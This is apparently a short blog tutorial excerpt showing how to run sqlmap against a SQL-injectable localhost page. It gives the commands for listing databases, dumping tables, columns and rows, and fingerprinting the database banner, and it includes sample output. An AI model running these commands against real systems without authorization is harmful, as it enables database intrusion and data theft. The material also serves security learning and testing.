How to hack remote database with sqlmap

In the previous post on we learnt how to use sqlmap to hack a vulnerable web application and fetch the list of databases, tables, columns and data rows. In this post we shall see how to do some simple fingerprinting on the remote database to find valuable information that can be used to assist in further exploitation of a system.
So lets say we have a vulnerable url
http://localhost/weak.php?id=10
where the id parameter is not escaped properly in the php code and suffers sql injection vulnerability. The commands to list out the databases would be
$ python ./sqlmap.py -u "http://localhost/weak.php?id=10" --dbs
Then use the -T --columns and the --dump options to list out the tables of a database, columns of a table and data in a table and so on.
Fingerprinting the remote system and its database
To find out more information about the remote system database use the option "-b". It will try to find the exact banner of the database server. Lets try it on a mysql database.
$ python sqlmap.py -u "http://localhost/weak.php?id=10" -b

.....

the back-end DBMS is MySQL
fetching banner
running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
retrieved: 5.1.61
web server operating system:...

Read full post here
How to hack remote database with sqlmap